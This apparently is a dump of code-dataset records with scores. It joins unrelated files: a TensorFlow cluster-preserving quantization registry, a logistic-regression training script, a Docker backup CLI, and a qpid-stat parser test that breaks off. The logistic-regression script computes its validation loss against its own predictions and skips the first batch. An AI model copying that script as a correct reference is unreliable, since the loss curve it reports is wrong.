class ClusterPreserveDefault8BitConvWeightsQuantizer(
ClusterPreserveDefaultWeightsQuantizer,
default_8bit_quantizers.Default8BitConvWeightsQuantizer):
"""ClusterPreserveWeightsQuantizer for default 8bit Conv2D weights."""
def __init__(self): # pylint:disable=super-init-not-called
default_8bit_quantizers.Default8BitConvWeightsQuantizer.__init__(self)
def build(self, tensor_shape, name, layer):
result = ClusterPreserveDefaultWeightsQuantizer._build_clusters(
self, name, layer)
result.update(
default_8bit_quantizers.Default8BitConvWeightsQuantizer.build(
self, tensor_shape, name, layer))
return result | tensorflow_model_optimization/python/core/quantization/keras/collaborative_optimizations/cluster_preserve/cluster_preserve_quantize_registry.py | """Registry responsible for built-in keras classes."""
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow_model_optimization.python.core.clustering.keras import clustering_registry
from tensorflow_model_optimization.python.core.quantization.keras import quant_ops
from tensorflow_model_optimization.python.core.quantization.keras import quantizers
from tensorflow_model_optimization.python.core.quantization.keras.default_8bit import default_8bit_quantize_registry
from tensorflow_model_optimization.python.core.quantization.keras.default_8bit import default_8bit_quantizers
layers = tf.keras.layers
def get_unique(t):
"""Get unique values and lookup index from N-D tensor.
Args:
t: tensor
Returns:
unique value, lookup index (same shape as input tensor)
Example:
t:
([[1.0, 2.0],
[2.0, 3.0],
[3.0, 3.0],
[1.0, 2.0]]
)
uniques:
([1.0, 2.0, 3.0])
output final index:
([[0, 1],
[1, 2],
[2, 2],
[0, 1]]
)
"""
t_flatten = tf.reshape(t, shape=(-1,))
uniques, index = tf.unique(t_flatten)
return uniques, tf.reshape(index, shape=tf.shape(t))
class _ClusterPreserveInfo(object):
"""ClusterPreserveInfo."""
def __init__(self, weight_attrs, quantize_config_attrs):
"""ClusterPreserveInfo.
Args:
weight_attrs: list of cluster preservable weight attributes of layer.
quantize_config_attrs: list of quantization configuration class name.
"""
self.weight_attrs = weight_attrs
self.quantize_config_attrs = quantize_config_attrs
class ClusterPreserveQuantizeRegistry(object):
"""ClusterPreserveQuantizeRegistry for built-in keras layers."""
# The keys represent built-in keras layers; the first values represent the
# the variables within the layers which hold the kernel weights, second
# values represent the class name of quantization configuration for layers.
# This decide the weights of layers with quantization configurations are
# cluster preservable.
_LAYERS_CONFIG_MAP = {
layers.Conv2D:
_ClusterPreserveInfo(['kernel'], ['Default8BitConvQuantizeConfig']),
layers.Dense:
_ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),
# DepthwiseConv2D is supported with 8bit qat, but not with
# clustering, thus for DepthwiseConv2D CQAT,
# preserving clustered weights is disabled.
layers.DepthwiseConv2D:
_ClusterPreserveInfo(['depthwise_kernel'],
['Default8BitQuantizeConfig']),
# layers that are supported with clustering, but not yet with qat
# layers.Conv1D:
# _ClusterPreserveInfo(['kernel'], []),
# layers.Conv2DTranspose:
# _ClusterPreserveInfo(['kernel'], []),
# layers.Conv3D:
# _ClusterPreserveInfo(['kernel'], []),
# layers.Conv3DTranspose:
# _ClusterPreserveInfo(['kernel'], []),
# layers.LocallyConnected1D:
# _ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),
# layers.LocallyConnected2D:
# _ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),
# SeparableConv need verify from 8bit qat
# layers.SeparableConv1D:
# _ClusterPreserveInfo(['pointwise_kernel'],
# ['Default8BitConvQuantizeConfig']),
# layers.SeparableConv2D:
# _ClusterPreserveInfo(['pointwise_kernel'],
# ['Default8BitConvQuantizeConfig']),
# Embedding need verify from 8bit qat
# layers.Embedding: _ClusterPreserveInfo(['embeddings'], []),
}
_DISABLE_CLUSTER_PRESERVE = frozenset({
layers.DepthwiseConv2D,
})
def __init__(self):
self._config_quantizer_map = {
'Default8BitQuantizeConfig':
ClusterPreserveDefault8BitWeightsQuantizer(),
'Default8BitConvQuantizeConfig':
ClusterPreserveDefault8BitConvWeightsQuantizer(),
}
@classmethod
def _no_trainable_weights(cls, layer):
"""Returns whether this layer has trainable weights.
Args:
layer: The layer to check for trainable weights.
Returns:
True/False whether the layer has trainable weights.
"""
return not layer.trainable_weights
@classmethod
def _disable_cluster_preserve(cls, layer):
"""Returns whether disable this layer for preserving clusters.
Args:
layer: The layer to check for disabling.
Returns:
True/False whether disabling this layer for preserving clusters.
"""
return layer.__class__ in cls._DISABLE_CLUSTER_PRESERVE
@classmethod
def supports(cls, layer):
"""Returns whether the registry supports this layer type.
Args:
layer: The layer to check for support.
Returns:
True/False whether the layer type is supported.
"""
# layers without trainable weights are consider supported,
# e.g., ReLU, Softmax, and AveragePooling2D.
if cls._no_trainable_weights(layer):
return True
if layer.__class__ in cls._LAYERS_CONFIG_MAP:
return True
return False
@classmethod
def _weight_names(cls, layer):
if cls._no_trainable_weights(layer):
return []
return cls._LAYERS_CONFIG_MAP[layer.__class__].weight_attrs
@classmethod
def get_cluster_preservable_weights(cls, layer):
"""Get cluster preservable weights from keras layer.
Args:
layer: instance of keras layer
Returns:
List of cluster preservable weights
"""
return [getattr(layer, weight) for weight in cls._weight_names(layer)]
@classmethod
def get_suppport_quantize_config_names(cls, layer):
"""Get class name of supported quantize config for layer.
Args:
layer: instance of keras layer
Returns:
List of supported quantize config class name.
"""
# layers without trainable weights don't need quantize_config for cqat
if cls._no_trainable_weights(layer):
return []
return cls._LAYERS_CONFIG_MAP[layer.__class__].quantize_config_attrs
def apply_cluster_preserve_quantize_config(self, layer, quantize_config):
"""Applies cluster-preserve weight quantizer.
Args:
layer: The layer to check for support.
quantize_config: quantization config for supporting cluster preservation
on clustered weights
Returns:
The quantize_config with addon cluster preserve weight_quantizer.
"""
if not self.supports(layer):
raise ValueError('Layer ' + str(layer.__class__) + ' is not supported.')
# Example: ReLU, Softmax, and AveragePooling2D (without trainable weights)
# DepthwiseConv2D (cluster_preserve is disabled)
if self._no_trainable_weights(layer) or self._disable_cluster_preserve(
layer):
return quantize_config
# Example: Conv2D, Dense layers
if quantize_config.__class__.__name__ in self._LAYERS_CONFIG_MAP[
layer.__class__].quantize_config_attrs:
quantize_config.weight_quantizer = self._config_quantizer_map[
quantize_config.__class__.__name__]
else:
raise ValueError('Configuration ' +
str(quantize_config.__class__.__name__) +
' is not supported for Layer ' + str(layer.__class__) +
'.')
return quantize_config
class Default8bitClusterPreserveQuantizeRegistry(
ClusterPreserveQuantizeRegistry):
"""Default 8 bit ClusterPreserveQuantizeRegistry."""
def get_quantize_config(self, layer):
"""Returns the quantization config with addon cluster preserve weight_quantizer for the given layer.
Args:
layer: input layer to return quantize config for.
Returns:
Returns the quantization config for cluster preserve weight_quantizer.
"""
quantize_config = (default_8bit_quantize_registry.
Default8BitQuantizeRegistry().
get_quantize_config(layer))
cluster_aware_quantize_config = super(
Default8bitClusterPreserveQuantizeRegistry,
self).apply_cluster_preserve_quantize_config(layer, quantize_config)
return cluster_aware_quantize_config
class ClusterPreserveDefaultWeightsQuantizer(quantizers.LastValueQuantizer):
"""Quantize weights while preserving clusters."""
def __init__(self, num_bits, per_axis, symmetric, narrow_range):
"""ClusterPreserveDefaultWeightsQuantizer.
Args:
num_bits: Number of bits for quantization
per_axis: Whether to apply per_axis quantization. The last dimension is
used as the axis.
symmetric: If true, use symmetric quantization limits instead of training
the minimum and maximum of each quantization range separately.
narrow_range: In case of 8 bits, narrow_range nudges the quantized range
to be [-127, 127] instead of [-128, 127]. This ensures symmetric
range has 0 as the centre.
"""
super(ClusterPreserveDefaultWeightsQuantizer, self).__init__(
num_bits=num_bits,
per_axis=per_axis,
symmetric=symmetric,
narrow_range=narrow_range,
)
def _build_clusters(self, name, layer):
"""Extract the cluster centroids and cluster indices from the pretrained clustered model.
Args:
name: Name of weights in layer.
layer: Quantization wrapped keras layer.
Returns:
A dictionary of the initial values of the
cluster centroids, cluster indices, original weights,
the pretrained flag for marking the first training
epoch, and weight name.
"""
weights = getattr(layer.layer, name)
centroids, lookup = get_unique(weights)
# Prepare trainable variables for the Keras graph
clst_centroids_tf = layer.add_weight(
'cluster_centroids_tf',
shape=centroids.shape,
initializer=tf.keras.initializers.Constant(
value=K.batch_get_value([centroids])[0]),
dtype=centroids.dtype,
trainable=True)
ori_weights_tf = layer.add_weight(
'ori_weights_vars_tf',
shape=weights.shape,
initializer=tf.keras.initializers.Constant(
value=K.batch_get_value([weights])[0]),
dtype=weights.dtype,
trainable=True)
# Get clustering implementation according to layer type
clustering_impl_cls = clustering_registry.ClusteringLookupRegistry().\
get_clustering_impl(layer.layer, name)
clustering_impl = clustering_impl_cls(clst_centroids_tf)
pulling_indices = tf.dtypes.cast(
clustering_impl.get_pulling_indices(ori_weights_tf),
lookup.dtype
)
pulling_indices_tf = layer.add_weight(
'pulling_indices_tf',
shape=lookup.shape,
initializer=tf.keras.initializers.Constant(
value=K.batch_get_value([pulling_indices])[0]),
dtype=lookup.dtype,
trainable=False)
for v in layer.weights:
if 'kernel' in v.name:
kernel = v
result = {
'cluster_centroids_tf': clst_centroids_tf,
'pulling_indices_tf': pulling_indices_tf,
'ori_weights_vars_tf': ori_weights_tf,
'weight_name': name,
'clst_impl': clustering_impl,
'set_kernel_weight': kernel,
}
return result
def build(self, tensor_shape, name, layer):
"""Extract centroids and indices to preserve weights clusters.
Args:
tensor_shape: Shape of weights which needs to be quantized.
name: Name of weights in layer.
layer: Quantization wrapped keras layer.
Returns:
Dictionary of centroids, indices and
quantization params, the dictionary will be passed
to __call__ function.
"""
# To get all the initial values from pretrained clustered model
result = self._build_clusters(name, layer)
result.update(
super(ClusterPreserveDefaultWeightsQuantizer,
self).build(tensor_shape, name, layer))
return result
def __call__(self, inputs, training, weights, **kwargs):
"""Apply cluster preserved quantization to the input tensor.
Args:
inputs: Input tensor (layer's weights) to be quantized.
training: Whether the graph is currently training.
weights: Dictionary of weights (params) the quantizer can use to
quantize the tensor (layer's weights). This contains the weights
created in the `build` function.
**kwargs: Additional variables which may be passed to the quantizer.
Returns:
quantized tensor.
"""
# update associations
if training:
weights['pulling_indices_tf'].assign(
tf.dtypes.cast(weights['clst_impl']
.get_pulling_indices(weights['ori_weights_vars_tf']),
weights['pulling_indices_tf'].dtype)
)
clustered_inputs = weights['clst_impl'].get_clustered_weight_forward(
weights['pulling_indices_tf'], weights['ori_weights_vars_tf']
)
weights['set_kernel_weight'].assign(clustered_inputs)
else:
clustered_inputs = inputs
return quant_ops.LastValueQuantize(
clustered_inputs,
weights['min_var'],
weights['max_var'],
is_training=training,
num_bits=self.num_bits,
per_channel=self.per_axis,
symmetric=self.symmetric,
narrow_range=self.narrow_range
)
class ClusterPreserveDefault8BitWeightsQuantizer(
ClusterPreserveDefaultWeightsQuantizer):
"""ClusterPreserveWeightsQuantizer for default 8bit weights."""
def __init__(self):
super(ClusterPreserveDefault8BitWeightsQuantizer,
self).__init__(num_bits=8,
per_axis=False,
symmetric=True,
narrow_range=True)
class ClusterPreserveDefault8BitConvWeightsQuantizer(
ClusterPreserveDefaultWeightsQuantizer,
default_8bit_quantizers.Default8BitConvWeightsQuantizer):
"""ClusterPreserveWeightsQuantizer for default 8bit Conv2D weights."""
def __init__(self): # pylint:disable=super-init-not-called
default_8bit_quantizers.Default8BitConvWeightsQuantizer.__init__(self)
def build(self, tensor_shape, name, layer):
result = ClusterPreserveDefaultWeightsQuantizer._build_clusters(
self, name, layer)
result.update(
default_8bit_quantizers.Default8BitConvWeightsQuantizer.build(
self, tensor_shape, name, layer))
return result | 0.965479 | 0.404008 |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from math import floor, log
import os
output_dir = "output/"
# 处理数据 x
def dataProcess_X(rawData):
#sex 只有两个属性 先drop之后处理
if "income" in rawData.columns:
Data = rawData.drop(["sex", 'income'], axis=1)
else:
Data = rawData.drop(["sex"], axis=1)
listObjectColumn = [col for col in Data.columns if Data[col].dtypes == "object"] #读取非数字的column
listNonObjedtColumn = [x for x in list(Data) if x not in listObjectColumn] #数字的column
ObjectData = Data[listObjectColumn]
NonObjectData = Data[listNonObjedtColumn]
#insert set into nonobject data with male = 0 and female = 1
NonObjectData.insert(0 ,"sex", (rawData["sex"] == " Female").astype(np.int))
#set every element in object rows as an attribute
ObjectData = pd.get_dummies(ObjectData)
Data = pd.concat([NonObjectData, ObjectData], axis=1)
Data_x = Data.astype("int64")
#normalize
Data_x = (Data_x - Data_x.mean()) / Data_x.std()
return Data_x
# 处理数据 y
def dataProcess_Y(rawData):
df_y = rawData['income']
Data_y = pd.DataFrame((df_y==' >50K').astype("int64"), columns=["income"])
return Data_y
def sigmoid(z):
res = 1 / (1.0 + np.exp(-z))
return np.clip(res, 1e-8, (1-(1e-8)))
#洗牌函数,洗乱数据集
def _shuffle(X, Y):
randomize = np.arange(X.shape[0])
np.random.shuffle(randomize)
return (X[randomize], Y[randomize])
def split_valid_set(X, Y, percentage):
all_size = X.shape[0]
valid_size = int(floor(all_size * percentage))
X, Y = _shuffle(X, Y)
X_valid, Y_valid = X[ : valid_size], Y[ : valid_size]
X_train, Y_train = X[valid_size:], Y[valid_size:]
return X_train, Y_train, X_valid, Y_valid
def valid(X, Y, w):
a = np.dot(w,X.T)
y = sigmoid(a)
y_ = np.around(y)
result = (np.squeeze(Y) == y_)
acc = float(result.sum()) / result.shape[0]
print('Valid acc = %f' % (float(result.sum()) / result.shape[0]))
return y_ , acc
def train(X_train, Y_train):
valid_set_percentage = 0.2
w = np.zeros(len(X_train[0]))
l_rate = 0.001
batch_size = 32
X_train, Y_train, X_valid, Y_valid = split_valid_set(X_train, Y_train, valid_set_percentage)
train_dataz_size = len(X_train)
step_num = int(floor(train_dataz_size / batch_size))
epoch_num = 300
list_cost = []
list_cost_v = []
accs_train = []
accs_valid = []
for epoch in range(1, epoch_num):
total_loss = 0.0
total_loss_v = 0.0
#X_train, Y_train = _shuffle(X_train, Y_train)
for idx in range(1, step_num):
X = X_train[idx*batch_size:(idx+1)*batch_size]
Y = Y_train[idx*batch_size:(idx+1)*batch_size]
z = np.dot(X, w)
y = sigmoid(z) #使用到了激活函数。
grad = np.sum(-1 * X * (np.squeeze(Y) - y).reshape((batch_size, 1)), axis=0)
w = w - l_rate * grad
cross_entropy = -1 * (
np.dot(np.squeeze(Y.T), np.log(y)) + np.dot((1 - np.squeeze(Y.T)), np.log(1 - y))) / len(Y)
total_loss += cross_entropy
z_v = np.dot(X_valid, w)
y_v = sigmoid(z_v)
total_loss_v += -1 * (np.dot(np.squeeze(y_v.T), np.log(y_v)) + np.dot((1 - np.squeeze(y_v.T)),
np.log(1 - y_v))) / len(y_v)
list_cost.append(total_loss)
list_cost_v.append(total_loss_v)
result = valid(X_train, Y_train, w)
result_v = valid(X_valid, Y_valid, w)
accs_train.append(result[1])
accs_valid.append(result_v[1])
drawLoss(list_cost,list_cost_v)
drawAccs(accs_train,accs_valid)
return w
def drawLoss(list_cost,list_cost_v):
plt.figure()
plt.plot(np.arange(len(list_cost)), list_cost)
plt.plot(np.arange(len(list_cost_v)), list_cost_v)
plt.legend(['train','dev'])
plt.title("Train Process")
plt.xlabel("epoch_num")
plt.ylabel("Cost Function (Cross Entropy)")
plt.savefig(os.path.join(os.path.dirname(output_dir), "TrainProcess"))
plt.show()
def drawAccs(accs_train,accs_valid):
plt.figure()
plt.plot(np.arange(len(accs_train)), accs_train)
plt.plot(np.arange(len(accs_valid)), accs_valid)
plt.legend(['train','dev'])
plt.title("Train Process")
plt.xlabel("epoch_num")
plt.ylabel("Accuracy of Function ")
plt.savefig(os.path.join(os.path.dirname(output_dir), "TrainProcess_accuracy"))
plt.show()
if __name__ == "__main__":
trainData = pd.read_csv("data/train.csv")
testData = pd.read_csv("data/test.csv")
# here is one more attribute in trainData
x_train = dataProcess_X(trainData).drop(['native_country_ Holand-Netherlands'], axis=1).values
x_test = dataProcess_X(testData).values
y_train = dataProcess_Y(trainData).values
x_test = np.concatenate((np.ones((x_test.shape[0], 1)), x_test), axis=1)
x_train = np.concatenate((np.ones((x_train.shape[0], 1)),x_train), axis=1)
w = train(x_train, y_train)
a = np.dot(w, x_test.T)
y = sigmoid(a)
y_ = np.around(y)
df = pd.DataFrame({"id": np.arange(1, 16282), "label": y_})
if not os.path.exists(output_dir):
os.mkdir(output_dir)
df.to_csv(os.path.join(output_dir + 'LR_output.csv'), sep='\t', index=False) | EX3/lr.py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from math import floor, log
import os
output_dir = "output/"
# 处理数据 x
def dataProcess_X(rawData):
#sex 只有两个属性 先drop之后处理
if "income" in rawData.columns:
Data = rawData.drop(["sex", 'income'], axis=1)
else:
Data = rawData.drop(["sex"], axis=1)
listObjectColumn = [col for col in Data.columns if Data[col].dtypes == "object"] #读取非数字的column
listNonObjedtColumn = [x for x in list(Data) if x not in listObjectColumn] #数字的column
ObjectData = Data[listObjectColumn]
NonObjectData = Data[listNonObjedtColumn]
#insert set into nonobject data with male = 0 and female = 1
NonObjectData.insert(0 ,"sex", (rawData["sex"] == " Female").astype(np.int))
#set every element in object rows as an attribute
ObjectData = pd.get_dummies(ObjectData)
Data = pd.concat([NonObjectData, ObjectData], axis=1)
Data_x = Data.astype("int64")
#normalize
Data_x = (Data_x - Data_x.mean()) / Data_x.std()
return Data_x
# 处理数据 y
def dataProcess_Y(rawData):
df_y = rawData['income']
Data_y = pd.DataFrame((df_y==' >50K').astype("int64"), columns=["income"])
return Data_y
def sigmoid(z):
res = 1 / (1.0 + np.exp(-z))
return np.clip(res, 1e-8, (1-(1e-8)))
#洗牌函数,洗乱数据集
def _shuffle(X, Y):
randomize = np.arange(X.shape[0])
np.random.shuffle(randomize)
return (X[randomize], Y[randomize])
def split_valid_set(X, Y, percentage):
all_size = X.shape[0]
valid_size = int(floor(all_size * percentage))
X, Y = _shuffle(X, Y)
X_valid, Y_valid = X[ : valid_size], Y[ : valid_size]
X_train, Y_train = X[valid_size:], Y[valid_size:]
return X_train, Y_train, X_valid, Y_valid
def valid(X, Y, w):
a = np.dot(w,X.T)
y = sigmoid(a)
y_ = np.around(y)
result = (np.squeeze(Y) == y_)
acc = float(result.sum()) / result.shape[0]
print('Valid acc = %f' % (float(result.sum()) / result.shape[0]))
return y_ , acc
def train(X_train, Y_train):
valid_set_percentage = 0.2
w = np.zeros(len(X_train[0]))
l_rate = 0.001
batch_size = 32
X_train, Y_train, X_valid, Y_valid = split_valid_set(X_train, Y_train, valid_set_percentage)
train_dataz_size = len(X_train)
step_num = int(floor(train_dataz_size / batch_size))
epoch_num = 300
list_cost = []
list_cost_v = []
accs_train = []
accs_valid = []
for epoch in range(1, epoch_num):
total_loss = 0.0
total_loss_v = 0.0
#X_train, Y_train = _shuffle(X_train, Y_train)
for idx in range(1, step_num):
X = X_train[idx*batch_size:(idx+1)*batch_size]
Y = Y_train[idx*batch_size:(idx+1)*batch_size]
z = np.dot(X, w)
y = sigmoid(z) #使用到了激活函数。
grad = np.sum(-1 * X * (np.squeeze(Y) - y).reshape((batch_size, 1)), axis=0)
w = w - l_rate * grad
cross_entropy = -1 * (
np.dot(np.squeeze(Y.T), np.log(y)) + np.dot((1 - np.squeeze(Y.T)), np.log(1 - y))) / len(Y)
total_loss += cross_entropy
z_v = np.dot(X_valid, w)
y_v = sigmoid(z_v)
total_loss_v += -1 * (np.dot(np.squeeze(y_v.T), np.log(y_v)) + np.dot((1 - np.squeeze(y_v.T)),
np.log(1 - y_v))) / len(y_v)
list_cost.append(total_loss)
list_cost_v.append(total_loss_v)
result = valid(X_train, Y_train, w)
result_v = valid(X_valid, Y_valid, w)
accs_train.append(result[1])
accs_valid.append(result_v[1])
drawLoss(list_cost,list_cost_v)
drawAccs(accs_train,accs_valid)
return w
def drawLoss(list_cost,list_cost_v):
plt.figure()
plt.plot(np.arange(len(list_cost)), list_cost)
plt.plot(np.arange(len(list_cost_v)), list_cost_v)
plt.legend(['train','dev'])
plt.title("Train Process")
plt.xlabel("epoch_num")
plt.ylabel("Cost Function (Cross Entropy)")
plt.savefig(os.path.join(os.path.dirname(output_dir), "TrainProcess"))
plt.show()
def drawAccs(accs_train,accs_valid):
plt.figure()
plt.plot(np.arange(len(accs_train)), accs_train)
plt.plot(np.arange(len(accs_valid)), accs_valid)
plt.legend(['train','dev'])
plt.title("Train Process")
plt.xlabel("epoch_num")
plt.ylabel("Accuracy of Function ")
plt.savefig(os.path.join(os.path.dirname(output_dir), "TrainProcess_accuracy"))
plt.show()
if __name__ == "__main__":
trainData = pd.read_csv("data/train.csv")
testData = pd.read_csv("data/test.csv")
# here is one more attribute in trainData
x_train = dataProcess_X(trainData).drop(['native_country_ Holand-Netherlands'], axis=1).values
x_test = dataProcess_X(testData).values
y_train = dataProcess_Y(trainData).values
x_test = np.concatenate((np.ones((x_test.shape[0], 1)), x_test), axis=1)
x_train = np.concatenate((np.ones((x_train.shape[0], 1)),x_train), axis=1)
w = train(x_train, y_train)
a = np.dot(w, x_test.T)
y = sigmoid(a)
y_ = np.around(y)
df = pd.DataFrame({"id": np.arange(1, 16282), "label": y_})
if not os.path.exists(output_dir):
os.mkdir(output_dir)
df.to_csv(os.path.join(output_dir + 'LR_output.csv'), sep='\t', index=False) | 0.326057 | 0.536677 |
import argparse
import re
import dockerbackuputils
from dockerbackuputils import *
#volumeBackup() function takes arguments and options parsed from cli and executes appropriate volume backup
#(i.e. full, only-running or only for provided list)
def volumeBackup(args):
if args.full:
cList = getContainerList(getContainerIdList())
if cList:
dockerVolumeBackup(cList, args.backup_path, args.number_of_copies)
print("\n **** Backup process of volumes successfully executed! **** \n")
else:
print("\n **** There is no container to backup! **** \n")
elif args.only_running:
cList = getRunningContainerList(getContainerIdList())
if cList:
dockerVolumeBackup(cList, args.backup_path, args.number_of_copies)
print("\n **** Backup process of volumes successfully executed! **** \n")
else:
print("\n **** There is no running container to backup! **** \n")
else:
cList = getContainerList(getContainerListFromNames(getContainerNamesFromCLI(args.container_list)))
if cList:
dockerVolumeBackup(cList, args.backup_path, args.number_of_copies)
print("\n **** Backup process of volumes successfully executed! **** \n")
else:
print("\n **** There is no container to backup! **** \n")
#imageBackup() function takes arguments and options parsed from cli and executes appropriate image backup
#(i.e. full or only for provided list)
def imageBackup(args):
if args.full:
iList = getImageList()
if iList:
dockerImageBackup(iList, args.backup_path, args.number_of_copies)
print("\n **** Backup process of images successfully executed! **** \n")
else:
print("\n **** There is no image to backup! **** \n")
else:
iList = getImageListFromNames(getImageNamesFromCLI(args.image_list))
if iList:
dockerImageBackup(iList, args.backup_path, args.number_of_copies)
print("\n **** Backup process of images successfully executed! **** \n")
else:
print("\n **** There is no image to backup! **** \n")
#create cli argument parser using python argparse framework
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--version", action="version", version="1.0.5") #add "--version" option
subparsers = parser.add_subparsers()
volumeParser = subparsers.add_parser("volume") #add subcommand "volume" for container volume backup
volumeParser.add_argument("-b", "--backup_path", help="absolute path to backup folder", required=True) #add --backup-path option
volumeParser.add_argument("-n", "--number_of_copies", help="number of backup copies to keep", type=int, required=True) #add --number-of-copies option
volumeParserGroup = volumeParser.add_mutually_exclusive_group(required=True) #add mutually exclusive arguments group
volumeParserGroup.add_argument("-a", "--full", action="store_true", help="backup all existing containers volumes") #add --full option to the group for full volume backup
volumeParserGroup.add_argument("-r", "--only_running", action="store_true", help="backup volumes only for running containers") #add --only_running option to the group for running containers volume backup
volumeParserGroup.add_argument("-l", "--container_list", help="comma separated list of container names enclosed in double quotes") #add --container_list option to the group
volumeParser.set_defaults(func=volumeBackup) #set default function for volume backup
imageParser = subparsers.add_parser("image") #add subcommand "image" for image backup
imageParser.add_argument("-b", "--backup_path", help="absolute path to backup folder", required=True) #add --backup-path option
imageParser.add_argument("-n", "--number_of_copies", help="number of backup copies to keep", type=int, required=True) #add --number-of-copies option
imageParserGroup = imageParser.add_mutually_exclusive_group(required=True) #add mutually exclusive arguments group
imageParserGroup.add_argument("-a", "--full", action="store_true", help="backup all existing images, excluding dangling") #add --full option to the group for full image backup
imageParserGroup.add_argument("-l", "--image_list", help="comma separated list of image names enclosed in double quotes") #add --image_list option to the group
imageParser.set_defaults(func=imageBackup) #set default function for image backup
#main function for docker-backup entry point
def mainfunc():
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
mainfunc() | apps/docker_backup.py | import argparse
import re
import dockerbackuputils
from dockerbackuputils import *
#volumeBackup() function takes arguments and options parsed from cli and executes appropriate volume backup
#(i.e. full, only-running or only for provided list)
def volumeBackup(args):
if args.full:
cList = getContainerList(getContainerIdList())
if cList:
dockerVolumeBackup(cList, args.backup_path, args.number_of_copies)
print("\n **** Backup process of volumes successfully executed! **** \n")
else:
print("\n **** There is no container to backup! **** \n")
elif args.only_running:
cList = getRunningContainerList(getContainerIdList())
if cList:
dockerVolumeBackup(cList, args.backup_path, args.number_of_copies)
print("\n **** Backup process of volumes successfully executed! **** \n")
else:
print("\n **** There is no running container to backup! **** \n")
else:
cList = getContainerList(getContainerListFromNames(getContainerNamesFromCLI(args.container_list)))
if cList:
dockerVolumeBackup(cList, args.backup_path, args.number_of_copies)
print("\n **** Backup process of volumes successfully executed! **** \n")
else:
print("\n **** There is no container to backup! **** \n")
#imageBackup() function takes arguments and options parsed from cli and executes appropriate image backup
#(i.e. full or only for provided list)
def imageBackup(args):
if args.full:
iList = getImageList()
if iList:
dockerImageBackup(iList, args.backup_path, args.number_of_copies)
print("\n **** Backup process of images successfully executed! **** \n")
else:
print("\n **** There is no image to backup! **** \n")
else:
iList = getImageListFromNames(getImageNamesFromCLI(args.image_list))
if iList:
dockerImageBackup(iList, args.backup_path, args.number_of_copies)
print("\n **** Backup process of images successfully executed! **** \n")
else:
print("\n **** There is no image to backup! **** \n")
#create cli argument parser using python argparse framework
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--version", action="version", version="1.0.5") #add "--version" option
subparsers = parser.add_subparsers()
volumeParser = subparsers.add_parser("volume") #add subcommand "volume" for container volume backup
volumeParser.add_argument("-b", "--backup_path", help="absolute path to backup folder", required=True) #add --backup-path option
volumeParser.add_argument("-n", "--number_of_copies", help="number of backup copies to keep", type=int, required=True) #add --number-of-copies option
volumeParserGroup = volumeParser.add_mutually_exclusive_group(required=True) #add mutually exclusive arguments group
volumeParserGroup.add_argument("-a", "--full", action="store_true", help="backup all existing containers volumes") #add --full option to the group for full volume backup
volumeParserGroup.add_argument("-r", "--only_running", action="store_true", help="backup volumes only for running containers") #add --only_running option to the group for running containers volume backup
volumeParserGroup.add_argument("-l", "--container_list", help="comma separated list of container names enclosed in double quotes") #add --container_list option to the group
volumeParser.set_defaults(func=volumeBackup) #set default function for volume backup
imageParser = subparsers.add_parser("image") #add subcommand "image" for image backup
imageParser.add_argument("-b", "--backup_path", help="absolute path to backup folder", required=True) #add --backup-path option
imageParser.add_argument("-n", "--number_of_copies", help="number of backup copies to keep", type=int, required=True) #add --number-of-copies option
imageParserGroup = imageParser.add_mutually_exclusive_group(required=True) #add mutually exclusive arguments group
imageParserGroup.add_argument("-a", "--full", action="store_true", help="backup all existing images, excluding dangling") #add --full option to the group for full image backup
imageParserGroup.add_argument("-l", "--image_list", help="comma separated list of image names enclosed in double quotes") #add --image_list option to the group
imageParser.set_defaults(func=imageBackup) #set default function for image backup
#main function for docker-backup entry point
def mainfunc():
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
mainfunc() | 0.252016 | 0.085595 |
from insights.parsers import qpid_stat
from insights.tests import context_wrap
import doctest
QPID_STAT_Q_DOCS = '''
Queues
queue dur autoDel excl msg msgIn msgOut bytes bytesIn bytesOut cons bind
==========================================================================================================================================================
00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 Y Y 0 2 2 0 486 486 1 2
0f7f1a3d-daff-42a6-a994-29050a2eabde:1.0 Y Y 0 8 8 0 4.88k 4.88k 1 2
'''
QPID_STAT_U_DOCS = '''
Subscriptions
subscr queue conn procName procId browse acked excl creditMode delivered sessUnacked
===========================================================================================================================================================================================================================
0 00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 qpid.10.20.1.10:5671-10.20.1.10:33787 celery 21409 CREDIT 2 0
0 pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113 qpid.10.20.1.10:5671-10.30.0.148:57423 goferd 32227 Y CREDIT 0 0
1 server.example.com:event qpid.10.20.1.10:5671-10.20.1.10:33848 Qpid Java Client 21066 Y Y WINDOW 2,623 0
0 celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d qpid.10.20.1.10:5671-10.20.1.10:33777 celery 21356 Y CREDIT 363,228 0
1 celery qpid.10.20.1.10:5671-10.20.1.10:33786 celery 21409 Y CREDIT 5 0
'''
def test_qpid_stat_q_docs():
env = {
'qpid_stat_q': qpid_stat.QpidStatQ(context_wrap(QPID_STAT_Q_DOCS)),
'qpid_stat_u': qpid_stat.QpidStatU(context_wrap(QPID_STAT_U_DOCS)),
}
failed, total = doctest.testmod(qpid_stat, globs=env)
assert failed == 0
QPID_STAT_Q = """
COMMAND> qpid-stat -q --ssl-certificate=/etc/pki/katello/qpid_client_striped.crt -b amqps://localhost:5671
Queues
queue dur autoDel excl msg msgIn msgOut bytes bytesIn bytesOut cons bind
==========================================================================================================================================================
00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 Y Y 0 2 2 0 486 486 1 2
server.example.com:event Y Y 0 2.62k 2.62k 0 45.5m 45.5m 1 2
celery Y 4 41 37 4.12k 37.5k 33.4k 8 2
pulp.agent.836a7366-4790-482d-b3bc-efee9d42b3cd Y 1 1 0 463 463 0 0 1
reserved_resource_worker-7@<EMAIL>.celery.pidbox Y 0 0 0 0 0 0 1 2
reserved_resource_worker-7@<EMAIL>.dq Y Y 0 182 182 0 229k 229k 1 2
""".strip()
def test_qpid_stat_q():
